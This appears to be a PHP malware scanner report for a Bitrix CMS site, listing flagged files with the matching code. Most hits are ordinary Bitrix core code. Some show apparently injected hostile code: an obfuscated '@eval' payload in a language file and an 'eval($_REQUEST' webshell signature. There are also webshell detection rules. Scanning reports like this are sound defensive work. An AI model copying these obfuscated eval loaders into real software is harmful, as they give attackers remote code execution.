Exploit infected_comment Line: 111 Warning Comments composed by 5 random chars usually used to detect if a file is infected yet |
/*width*/
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list.ex/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 19.20 kB Created: 2023-03-11 16:41:52 Modified: 2023-11-27 14:53:28 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery/templates/.default/bitrix/blog.post.comment/photogallery/template.php Size: 30.30 kB Created: 2023-03-11 16:41:45 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/install/components/bitrix/photogallery.detail.list/templates/slider_big/template.php Size: 16.32 kB Created: 2023-03-11 16:41:53 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Line: 338 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("div.onclick = function(e){jsUtils.PreventDefault(e); jsUtils.Redirect([], '" + res[ii].href + "');};");
res[ii].parentNode.insertBefore(div, res[ii]);
res[ii].onmouseover = function()
{
this.previousSibling.onshow();
this.bxMouseOver = 'Y';
};
res[ii].onmouseout = function()
{
this.bxMouseOver = 'N';
var __this = this;
setTimeout(
function()
{
if (__this.previousSibling && __this.previousSibling.bxMouseOver != "Y")
{
__this.previousSibling...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/photogallery/lang/en/classes/general/access.php Size: 81.43 kB Created: 2023-03-15 04:25:15 Modified: 2023-11-27 14:53:28 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit silenced_eval Line: 12 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval($Éßé¾ê…($¾ê($ãõà·,'',$éÉ‹ß…æê('W6auMTM62tn2TRXX’T2tu’t’bŽN–’AžhŸCƒŠ62XTK€mG82MOQ‡nZO2sG8VehGC’’+‰ p+nWAA•Ac’GŠsVƒOC7‰At SUN=scndZaxŽCaZƒ8–›nˆRŠtœy n– 8NCXv•nGW‰=’ue‰‘=oƒNœt–UœpORURŠAœe€x=–m K›ŠŽ€2aWš‰ Wk ŠvMŽM’€OU=MpMˆŽe+UŽaAŸNRp–N•‰A8€m––u+8ŸxpmžœNGŽe‰Ž–Ÿƒvuƒsc–žcSaxQWšdOžWvKCRd+S’‰= R7=CeX8žyuŸuemšAŠ–NZ+UyŠCž6XŽ€PvdSs‡€k=Wcc+•a‡8SœKž+N8Š7m8œ‰p‹8Ve‹Žxt–+xhT','m“9L™O+aXv= ž/Œ˜’Žc•3”db€WhFHt–—2EP7‹5ŸšnS…TfA‰lqxƒC‘wg‚84o0jyVZr›YuŠB„DUIJœˆzkKNeM1RGp‡6†iQs'...
| Function eval Line: 12 Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($Éßé¾ê…($¾ê($ãõà·,'',$éÉ‹ß…æê('W6auMTM62tn2TRXX’T2tu’t’bŽN–’AžhŸCƒŠ62XTK€mG82MOQ‡nZO2sG8VehGC’’+‰ p+nWAA•Ac’GŠsVƒOC7‰At SUN=scndZaxŽCaZƒ8–›nˆRŠtœy n– 8NCXv•nGW‰=’ue‰‘=oƒNœt–UœpORURŠAœe€x=–m K›ŠŽ€2aWš‰ Wk ŠvMŽM’€OU=MpMˆŽe+UŽaAŸNRp–N•‰A8€m––u+8ŸxpmžœNGŽe‰Ž–Ÿƒvuƒsc–žcSaxQWšdOžWvKCRd+S’‰= R7=CeX8žyuŸuemšAŠ–NZ+UyŠCž6XŽ€PvdSs‡€k=Wcc+•a‡8SœKž+N8Š7m8œ‰p‹8Ve‹Žxt–+xhT','m“9L™O+aXv= ž/Œ˜’Žc•3”db€WhFHt–—2EP7‹5ŸšnS…TfA‰lqxƒC‘wg‚84o0jyVZr›YuŠB„DUIJœˆzkKNeM1RGp‡6†iQs',...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/include/rolesdefinitions.php Size: 2.22 kB Created: 2023-03-11 16:39:15 Modified: 2023-11-27 14:53:29 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/include/actionsdefinitions.php Size: 14.10 kB Created: 2023-03-11 16:39:15 Modified: 2023-11-27 14:53:29 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/shelladapter.php Size: 1.88 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Warns: 3 Dangers: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command. " > ".$outputPath." 2>&1 &"); return true; } public function getLastOutput() { return $this->resOutput; } public function getLastError() { return $this->resError; } public function syncExec($command) { $command = $this->prepareExecution($command); $retVal = 1; $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $pipes = array(); $process = proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0...
| Function proc_close Line: 93 Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process)
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command); fclose($pipes[0]); $this->resOutput = stream_get_contents($pipes[1]); fclose($pipes[1]); $this->resError = stream_get_contents($pipes[2]); fclose($pipes[2]); $retVal = proc_close($process)
| Function strrev exec_strrev Line: 39 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/serversdata.php Size: 5.18 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/provider.php Size: 6.41 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/actionsdata.php Size: 6.29 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$param', $fBody); $result = $newfunc($buildParam); } return $result; } public static function setLogLevel($logLevel) { self::$logLevel = $logLevel; } public static function checkRunningAction() { $result = array(); $shellAdapter = new ShellAdapter(); $execRes = $shellAdapter->syncExec("sudo -u root /opt/webdir/bin/bx-process -a list -o json"); $data = $shellAdapter->getLastOutput(); if($execRes) { $arData = json_decode($data, true); $result = array(); if(isset($arData["params"])...
| Function strrev exec_strrev Line: 85 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/sitesdata.php Size: 1.57 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/helper.php Size: 4.89 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/actionmodifyer.php Size: 2.59 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/action.php Size: 6.72 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("", $paramCode); if(is_callable($func)) { $res = $func(); $retStr = str_replace('##CODE_PARAMS:'.$paramId.'##', $res, $retStr); } } } foreach ($this->freeParams as $key => $paramValue) $retStr = str_replace('##'.$key.'##', $paramValue, $retStr); return $retStr; } public function start(array $inputParams = array()) { if(!is_array($inputParams)) throw new \Bitrix\Main\ArgumentTypeException("inputParams", "array"); if(isset($this->actionParams["MODIFYERS"]) && is_array($this->action...
| Function strrev exec_strrev Line: 152 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lib/monitoring.php Size: 14.81 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', $item["DATA_FUNC"]); if(is_callable($func)) { $result = $func($data); } } else { if(isset($data["calcpr"])) { $data["data"] = $data["calcpr"]; } $result = static::extractRrdValue($data); } return $result; } protected static function extractRrdValue($data) { $result = false; if(isset($data["data"]) && is_array($data["data"])) { reset($data["data"]); $result = current($data["data"]); } return trim($result); } protected static function getAnsibleSetup($hostname) { static $i...
| Function strrev exec_strrev Line: 340 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/admin/menu.php Size: 1.17 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
| Description | Match |
|---|
Exploit php_uname Line: 13 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lang/en/include/actionsdefinitions.php Size: 2.74 kB Created: 2023-03-11 16:39:15 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lang/ua/include/actionsdefinitions.php Size: 3.62 kB Created: 2023-03-11 16:39:14 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/scale/lang/ru/include/actionsdefinitions.php Size: 3.68 kB Created: 2023-03-11 16:39:15 Modified: 2023-11-27 14:53:29 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/fileman/fileman.php Size: 90.00 kB Created: 2023-03-11 16:38:52 Modified: 2023-11-27 14:53:24 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/fileman/options.php Size: 65.79 kB Created: 2023-03-11 16:38:52 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/fileman/classes/general/editor_utils.php Size: 8.27 kB Created: 2023-03-11 16:38:54 Modified: 2023-11-27 14:53:24 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($code); echo '#BX_RENDERED_COMPONENT#'; $s = ob_get_contents(); ob_end_clean(); return $s; } function _RenderAllComponents($arParams, $bLPA) { global $APPLICATION, $USER; $s = ''; $arPHP = PHPParser::ParseFile($arParams['source']); $l = count($arPHP); if ($l > 0) { $new_source = ''; $end = 0; $comp_count = 0; ob_start(); for ($n = 0; $n<$l; $n++) { $src = $arPHP[$n][2]; if (SubStr($src, 0, 5) == "<?"."php") $src = SubStr($src, 5); else $src = SubStr($src, 2); $src = SubStr($src, 0, -2); $co...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/fileman/admin/fileman_js.php Size: 1.58 kB Created: 2023-03-11 16:38:54 Modified: 2023-11-27 14:53:24 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/fileman/admin/fileman_admin.php Size: 51.04 kB Created: 2023-03-11 16:38:54 Modified: 2023-11-27 14:53:24 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 17 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"]."/bitrix/admin/fileman_access.php")
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] |
posix_getpwuid(fileowner($fnameConverted)); $arrFileGroup = posix_getgrgid(filegroup($fnameConverted)); $showField .= " ".$arrFileOwner['name']." ".$arrFileGroup['name']; } } else $showField = " "; } $row->AddField("PERMS", $showField); } $showField = ""; if (in_array("PERMS_B", $arVisibleColumns)) { $showField = " "; if(($USER->CanDoOperation('fileman_view_permissions') || $USER->CanDoOperation('fileman_edit_all_settings')) && $USER->CanDoFileOperation('fm_view_permission', $arPath)) ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/clouds/admin/clouds_file_list.php Size: 26.57 kB Created: 2023-03-11 16:39:35 Modified: 2023-11-27 14:53:24 Dangers: 1
| Description | Match |
|---|
Sign 11413268 Line: 103 Dangerous Malware Signature (hash: 11413268) |
eval($_REQUEST
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/lib/base/controller.php Size: 12.52 kB Created: 2023-03-11 16:41:58 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { try { $this->collectDebugInfo(); $this->resolveAction(); $this->checkAction(); if ($this->prepareParams() && $this->errorCollection->isEmpty() && $this->processBeforeAction($this->getAction()) === true) { $this->runAction(); } $this->logDebugInfo(); } catch(\Exception $e) { $this->errorCollection->add(array(new Error($e->getMessage()))); } if (!$this->errorCollection->isEmpty()) { $this->sendJsonErrorResponse(); } } protected function collectDebugInfo() { if($this->collectDebugInfo) { D...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/options.php Size: 4.53 kB Created: 2023-03-11 16:41:58 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 33 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name[0]}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/vote_tools.php Size: 17.63 kB Created: 2023-03-11 16:42:01 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/admin/vote_dialog.php Size: 1.75 kB Created: 2023-03-11 16:42:01 Modified: 2023-11-27 14:53:31 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/install/public/tools/vote_chart.php Size: 448.00 B Created: 2023-03-11 16:41:58 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/install/tools/vote_chart.php Size: 448.00 B Created: 2023-03-11 16:42:01 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/vote/install/index.php Size: 8.21 kB Created: 2023-03-11 16:41:58 Modified: 2023-11-27 14:53:31 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/asd.subscribequick/install/index.php Size: 4.60 kB Created: 2023-03-11 16:39:38 Modified: 2023-11-27 14:53:21 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/translate/translate_tools.php Size: 13.14 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:31 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/translate/options.php Size: 4.30 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:31 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 50 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/translate/admin/translate_list.php Size: 21.08 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/translate/admin/translate_edit.php Size: 17.25 kB Created: 2023-03-11 16:38:42 Modified: 2023-11-27 14:53:31 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/include/prolog_after.php Size: 4.52 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/include/urlrewrite.php Size: 5.13 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:26 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/public/top_panel.php Size: 54.78 kB Created: 2018-01-19 19:01:34 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/public/menu_edit.php Size: 21.81 kB Created: 2018-01-17 22:07:10 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(\''.$out.'\');'; ?>
var arCellsHTML = [
'<span class="rowcontrol drag" title="<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_DRAG'))?>"></span>',
getAreaHTML('text_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_TEXT_EDIT'))?>'),
getAreaHTML('link_' + nums, '', '<?=CUtil::JSEscape(GetMessage('MENU_EDIT_TOOLTIP_LINK_EDIT'))?>'),
'<span onclick="if (!GLOBAL_bDisableActions) {currentLink = \'' + nums + '\'; OpenFileBrowserWindFile_' + nums + '();}" class="rowcontrol...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/epilog_main_admin.php Size: 4.07 kB Created: 2018-01-19 18:46:22 Modified: 2023-11-27 14:53:27 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/epilog_auth_admin.php Size: 1.56 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/lang_files.php Size: 3.48 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/prolog_auth_admin.php Size: 2.90 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/admin_lib.php Size: 58.72 kB Created: 2018-01-19 19:03:44 Modified: 2023-11-27 14:53:27 Warns: 1 Dangers: 1
| Description | Match |
|---|
Exploit execution Line: 443 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/admin/.left.menu.php")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcasecmp($a["ID"], $b["ID"]);')); return $aThemes; } public static function GetCurrentTheme() { $aUserOpt = CUserOptions::GetOption("global", "settings"); if($aUserOpt["theme_id"] <> "") { $theme = preg_replace("/[^a-z0-9_.-]/i", "", $aUserOpt["theme_id"]); if($theme <> "") { return $theme; } } return ".default"; } } class CAdminUtil { public static function dumpVars($vars, $arExclusions = array()) { $result = ""; if (is_array($vars)) { foreach ($vars as $varN...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/auth/wrapper.php Size: 5.87 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:27 Dangers: 2
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/prolog_main_admin.php Size: 15.84 kB Created: 2018-01-19 18:46:29 Modified: 2023-11-27 14:53:27 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/epilog_jspopup_admin.php Size: 221.00 B Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:27 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/interface/admin_list.php Size: 38.62 kB Created: 2018-01-19 19:02:13 Modified: 2023-11-27 14:53:27 Warns: 2
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if($a["__sort"] == $b["__sort"]) return 0; return ($a["__sort"] < $b["__sort"])? -1 : 1;')); } foreach($this->aHeaders as $id=>$arHeader) { if(in_array($id, $this->arVisibleColumns)) $this->aVisibleHeaders[$id] = $arHeader; } if (isset($_REQUEST["mode"]) && $_REQUEST["mode"] == "settings") $this->ShowSettings($aAllCols, $aCols, $aOptions); } function ShowSettings($aAllCols, $aCols, $aOptions) { global $USER; require($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/inclu...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval(this.form.action[this.form.action.selectedIndex].getAttribute('custom_action'));return false;}" disabled="disabled" class="adm-table-action-button" />
<? endif; ?>
<span class="adm-table-counter" id="<?=$this->table_id?>_selected_count"><?=GetMessage('admin_lib_checked')?>: <span>0</span></span>
<? endif; ?>
</div>
<? } public function DisplayList($arParams = array()) { $menu = new CAdminPopup($this->table_id."_menu", $this->table_id."_menu"); $menu->Show(); if( (isset($_REQUEST['ajax_debu...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/config/configuration.php Size: 9.95 kB Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/config/option.php Size: 11.03 kB Created: 2018-01-19 19:01:45 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 133 Warning Double var technique is usually used for the obfuscation of malicious code |
${$varName}
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/composite/responder.php Size: 18.28 kB Created: 2018-01-19 19:02:20 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/eventmanager.php Size: 12.57 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if ($a["SORT"] == $b["SORT"]) return 0; return ($a["SORT"] < $b["SORT"]) ? -1 : 1;'); foreach (array_keys($handlers) as $moduleId) { foreach (array_keys($handlers[$moduleId]) as $event) { uasort($this->handlers[$moduleId][$event], $funcSort); } } } $this->isHandlersLoaded = true; } protected function clearLoadedHandlers() { $managedCache = Application::getInstance()->getManagedCache(); $managedCache->clean(self::$cacheKey); foreach($this->handlers as $module=>$types) {...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/page/asset.php Size: 58.20 kB Created: 2018-01-19 19:02:20 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$matches', 'return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2], "'.addslashes($path).'").")";'), $content ); $content = preg_replace_callback( '#(\s*@import\s*)([\'"])([^\'"]+)(\2)#si', create_function('$matches', 'return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2],"'.addslashes($path).'");'), $content ); return $content; } public function groupJs($from = '', $to = '') { if(empty($from) || empty($to)) { return; } $to ...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/userconsent/consent.php Size: 3.39 kB Created: 2018-01-19 19:01:39 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 99 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$provider['DATA']($originId)
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/userconsent/internals/componentcontroller.php Size: 1.99 kB Created: 2018-01-19 19:01:39 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->request = Context::getCurrent()->getRequest(); $this->action = $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/servicemanager.php Size: 1.95 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:28 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 55 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$obj[1]()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/mail/eventmessagethemecompiler.php Size: 10.14 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('use \Bitrix\Main\Mail\EventMessageThemeCompiler; ob_start();?>' . $template . '<? return ob_get_clean();'); } catch(StopException $e) { ob_clean(); throw $e; } return $result; } protected function addReplaceCallback($identificator, $callback) { $this->replaceCallback[$identificator] = $callback; } protected function executeReplaceCallback() { $arReplaceIdentificators = array(); $arReplaceStrings = array(); foreach($this->replaceCallback as $identificator => $callback) { $result = call_user...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/modulemanager.php Size: 2.94 kB Created: 2018-01-19 18:59:42 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/ui/uploader/uploader.php Size: 12.99 kB Created: 2018-01-19 19:03:39 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$v,$k', 'if($k=="error"){$v=preg_replace("/<(.+?)>/is".BX_UTF_PCRE_MODIFIER, "", $v);}')); return self::removeTmpPath($data); } protected function fillRequireData() { $this->mode = $this->getRequest("mode"); if (!in_array($this->mode, array("upload", "delete", "view"))) throw new ArgumentOutOfRangeException("mode"); if ($this->mode != "view" && !check_bitrix_sessid()) throw new AccessDeniedException("Bad sessid."); $this->version = $this->getRequest("version"); $directory = \CB...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/ui/fileinputreceiver.php Size: 6.95 kB Created: 2018-01-19 18:57:16 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->getAgent()->checkPost()
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/ui/fileinputunclouder.php Size: 3.06 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($mode = "basic", $params = array()) { $res = $this->check($params); if ($this->check($params)) { $this->file = \CFile::getByID($this->id)->fetch(); if ($mode == "resize" && ($file = \CFile::ResizeImageGet($this->id, $params, BX_RESIZE_IMAGE_PROPORTIONAL, true)) && $file) { $this->file["SRC"] = $file["src"]; $this->file["WIDTH"] = $file["width"]; $this->file["HEIGHT"] = $file["height"]; $this->file["FILE_SIZE"] = $file["size"]; } \CFile::ViewByUser($this->file, array("force_download" => fals...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/data/connectionpool.php Size: 8.44 kB Created: 2018-01-17 22:07:20 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/db/connection.php Size: 21.29 kB Created: 2018-01-19 19:02:09 Modified: 2023-11-27 14:53:28 Dangers: 1
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/entity/query.php Size: 75.99 kB Created: 2018-01-19 19:03:39 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->is_executing = true; $query = $this->buildQuery(); $cacheId = ""; $ttl = 0; $result = null; if($this->cacheTtl > 0 && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl = $this->entity->getCacheTtl($this->cacheTtl); } if($ttl > 0) { $cacheId = md5($query); $result = $this->entity->readFromCache($ttl, $cacheId, $this->countTotal); } if($result === null) { $result = $this->query($query); if($ttl > 0) { $result = $this->entity->writeToCache($result, $cacheId, $this->count...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/lib/entity/base.php Size: 20.70 kB Created: 2018-01-19 19:02:13 Modified: 2023-11-27 14:53:28 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($eval); $entity = self::getInstance($entity_name); foreach ($fieldsMap as $k => $v) { $entity->addField($v, $k); } return $entity; } public static function compileEntity($entityName, $fields = null, $parameters = array()) { $classCode = ''; $classCodeEnd = ''; if (strtolower(substr($entityName, -5)) !== 'table') { $entityName .= 'Table'; } if (!preg_match('/^[a-z0-9_]+$/i', $entityName)) { throw new Main\ArgumentException(sprintf( 'Invalid entity classname `%s`.', $entityName )); } $fullEnt...
|
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/mysql/database.php Size: 23.42 kB Created: 2018-01-19 19:02:20 Modified: 2023-11-27 14:53:26 Warns: 1 Dangers: 3
|
/var/www/allstarsO/allstars.ua/bitrix/modules/main/classes/mysql/agent.php Size: 5.18 kB Created: 2018-01-19 19:03:39 Modified: 2023-11-27 14:53:26 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("\$eval_result=".$arAgent["NAME"]); } catch (Exception $e) { CTimeZone::Enable(); $application = \Bitrix\Main\Application::getInstance(); $exceptionHandler = $application->getExceptionHandler(); $exceptionHandler->writeToLog($e); continue; } CTimeZone::Enable(); if ($logFunction) $logFunction($arAgent, "finish", $eval_result, $e); if($e === false) { continue; } elseif(strlen($eval_result)<=0) { $strSql = "DELETE FROM b_agent WHERE ID=".$arAgent["ID"]; } else { $strSql = "
UPDATE b_agen...
|
|
